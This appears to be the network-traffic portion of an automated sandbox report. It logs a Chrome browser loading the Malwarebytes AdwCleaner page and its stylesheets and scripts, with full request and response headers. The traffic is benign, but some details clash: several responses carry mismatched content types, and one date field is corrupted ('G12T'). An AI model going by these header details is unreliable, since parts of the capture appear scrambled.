                                                                                                                                                                      GET /images?q=tbn:ANd9GcQob5OIozebeIXq0sgc4ybFnGMw2CY4K46d6m7HycnfLnADxXwwnEM&s=0 HTTP/2.0
                                                                                                                                                                      host: encrypted-tbn0.gstatic.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      x-client-data: CIr6ygE=
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.google.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /adwcleaner HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      upgrade-insecure-requests: 1
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: navigate
                                                                                                                                                                      sec-fetch-user: ?1
                                                                                                                                                                      sec-fetch-dest: document
                                                                                                                                                                      referer: https://www.google.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      cache-control: private
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:02 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-aspnet-version: 4.0.30319
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: ppVAMHwt--5_xytnbTKhE2e6xxpl1B3n6J2-e-MNzCMuAG543bkdZw==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/fonts.min.css
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/fonts.min.css HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/css,*/*;q=0.1
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: style
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/css
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:24 GMT
                                                                                                                                                                      etag: W/"1f51d332750d81:0"
                                                                                                                                                                      last-modified: Thu, 14 Apr 2022 17:43:49 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: 9fJEsaiVrrFDcMdfk4q6YScKIGN3Fw9DVLNQ1czA4NICekXvtFq7FQ==
                                                                                                                                                                      age: 338
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/js/library/jquery.min.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /js/library/jquery.min.js HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/css
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:24 GMT
                                                                                                                                                                      etag: W/"8ef7f02e56cdd81:0"
                                                                                                                                                                      last-modified: Wed, 21 Sep 2022 01:05:04 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: io2SNou-9CwKICze9xNqBvHGNVk7RNUs91Zs-rUQkjVOzGPksrmSBQ==
                                                                                                                                                                      age: 338
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/bootstrap_mwb.min.css
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/bootstrap_mwb.min.css HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/css,*/*;q=0.1
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: style
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/css
                                                                                                                                                                      last-modified: Fri, 18 Nov 2022 02:09:04 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:24 GMT
                                                                                                                                                                      etag: W/"6ebbf6bbf2fad81:0"
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: q5yVdYXNvvdyRJ8DPN3RNypZ-WUqp-u6-U_3idPwihwsiywPcB21Nw==
                                                                                                                                                                      age: 338
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/bootstrap_overrides.min.css
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/bootstrap_overrides.min.css HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/css,*/*;q=0.1
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: style
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/css
                                                                                                                                                                      last-modified: Wed, 07 Dec 2022 21:33:27 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:02 GMT
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      etag: W/"d10528b83ad91:0"
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: 0zdS6x7x1MqpKjWRsxvr3fDAfCWyb_8OiOKUhgkfQxLol-PjZF-3Mg==
                                                                                                                                                                      age: 338
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/font-awesome.min.css
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/font-awesome.min.css HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: style
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/css
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:24 GMT
                                                                                                                                                                      etag: W/"c3c2ed1a3dd0d71:0"
                                                                                                                                                                      last-modified: Tue, 02 Nov 2021 22:58:09 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: QtOtuhElZFw7coWftBRLEqkGBnrWuXh-e2YqS7QsBPh3r-UGrG0PIg==
                                                                                                                                                                      age: 338
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/user-experience/animation/animate-on-scroll.min.css
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/user-experience/animation/animate-on-scroll.min.css HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/css,*/*;q=0.1
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: style
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: application/javascript
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:24 GMT
                                                                                                                                                                      etag: W/"c45b9856e6bd91:0"
                                                                                                                                                                      last-modified: Fri, 09 Dec 2022 15:53:10 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: cRK9vxRMGnvAagMr2Y2x96Np_rxltfhRB5Sdb9wntggqt04F1QKlYA==
                                                                                                                                                                      age: 338
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/pages/adwcleaner/index.min.css
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/pages/adwcleaner/index.min.css HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/css,*/*;q=0.1
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: style
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      cache-control: max-age=30
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:02 GMT
                                                                                                                                                                      etag: W/"176845 - 638071491080000000"
                                                                                                                                                                      last-modified: Tue, 20 Dec 2022 16:05:08 G12T
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-aspnet-version: 4.0.30319
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: aBcVQsyWGtB6HkVjjPq3KAN9FjmBeZDEQjXdgIu9mKeZ8blGOZeQgQ==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/__bundle.css?f=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
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /__bundle.css?f=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 HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/css,*/*;q=0.1
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: style
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/css
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:02 GMT
                                                                                                                                                                      etag: W/"9e3d46f4b464d81:0"
                                                                                                                                                                      last-modified: Tue, 10 May 2022 21:28:56 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: DRR8OeehDzqSpAGXAW1Cvhi6xBrkWjc1ERgYlgoGUs5vFpXkdosdiQ==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/__bundle.js?f=L2pzL3N0cmluZy9zdHJpbmcubWluLmpzLC9qcy9zZXNzaW9uL3Nlc3Npb24ubWluLmpzLC9qcy9jb3VudHJ5Lm1pbi5qcywvanMvZ2xvYmFsX213Yi5taW4uanMsL2pzL3BlcnNvbmFsaXphdGlvbi91c2VyLm1pbi5qcywvanMvbWVkaWEvaW1hZ2VzL2xhenlsb2FkaW5nLm1pbi5qcywvanMvYm9vdHN0cmFwLm1pbi5qcywvanMvbW9kZXJuaXpyLmpzLC9scC9zZW0vYXNzZXRzL2pzL3Jlc3BvbmQubWluLmpzLC9qcy9nbG9iYWwuanMsL2pzL3hzLm1pbi5qcywvanMvdXNlci1leHBlcmllbmNlL2FuaW1hdGlvbi9hbmltYXRlLW9uLXNjcm9sbC5taW4uanN8MTFBQjcxMjc4MUE2MkQ0MUYwQzM1REExN0E4MzFFNTE=
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /__bundle.js?f=L2pzL3N0cmluZy9zdHJpbmcubWluLmpzLC9qcy9zZXNzaW9uL3Nlc3Npb24ubWluLmpzLC9qcy9jb3VudHJ5Lm1pbi5qcywvanMvZ2xvYmFsX213Yi5taW4uanMsL2pzL3BlcnNvbmFsaXphdGlvbi91c2VyLm1pbi5qcywvanMvbWVkaWEvaW1hZ2VzL2xhenlsb2FkaW5nLm1pbi5qcywvanMvYm9vdHN0cmFwLm1pbi5qcywvanMvbW9kZXJuaXpyLmpzLC9scC9zZW0vYXNzZXRzL2pzL3Jlc3BvbmQubWluLmpzLC9qcy9nbG9iYWwuanMsL2pzL3hzLm1pbi5qcywvanMvdXNlci1leHBlcmllbmNlL2FuaW1hdGlvbi9hbmltYXRlLW9uLXNjcm9sbC5taW4uanN8MTFBQjcxMjc4MUE2MkQ0MUYwQzM1REExN0E4MzFFNTE= HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/css; charset=utf-8
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      cache-control: max-age=30
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:02 GMT
                                                                                                                                                                      etag: W/"28094 - 638084352580000000"
                                                                                                                                                                      last-modified: Wed, 04 Jan 2023 13:20:58 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-aspnet-version: 4.0.30319
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: UKvtbl4SNhyOVJrofqdIEEObUMxqQ2bZxw1YExoQLnszBqXMD8pQzQ==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/__bundle.js?f=L2pzL3VzZXItZXhwZXJpZW5jZS9hbmltYXRpb24vYW5pbWF0ZS1vbi1zY3JvbGwubWluLmpzLC9qcy91c2VyLWV4cGVyaWVuY2Uvc2Nyb2xsLm1pbi5qcywvanMvdXNlci1leHBlcmllbmNlL25hdmlnYXRpb24ubWluLmpzfEMwMjFDNzc4NEM5MUNCNTczM0RCODc3REEyMTVERjNE
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /__bundle.js?f=L2pzL3VzZXItZXhwZXJpZW5jZS9hbmltYXRpb24vYW5pbWF0ZS1vbi1zY3JvbGwubWluLmpzLC9qcy91c2VyLWV4cGVyaWVuY2Uvc2Nyb2xsLm1pbi5qcywvanMvdXNlci1leHBlcmllbmNlL25hdmlnYXRpb24ubWluLmpzfEMwMjFDNzc4NEM5MUNCNTczM0RCODc3REEyMTVERjNE HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: application/javascript
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:24 GMT
                                                                                                                                                                      etag: W/"8e618b206aedd81:0"
                                                                                                                                                                      last-modified: Mon, 31 Oct 2022 20:48:27 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: kgTLwfUF3eJ7CiHJ8sfosOtV0rVNBzKgvdZpnt3A9BSBrRn9mDP85w==
                                                                                                                                                                      age: 338
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/js/utilities.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /js/utilities.js HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      cache-control: max-age=30
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:02 GMT
                                                                                                                                                                      etag: W/"15987 - 638061971170000000"
                                                                                                                                                                      last-modified: Fri, 09 Dec 2022 15:38:37 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-aspnet-version: 4.0.30319
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: hShx4VM-aVetMbiGYyLl-DydiXAO7LqhtddFSmvL9RaVvSS65vK0BA==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/js/pages/masterpage.min.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /js/pages/masterpage.min.js HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
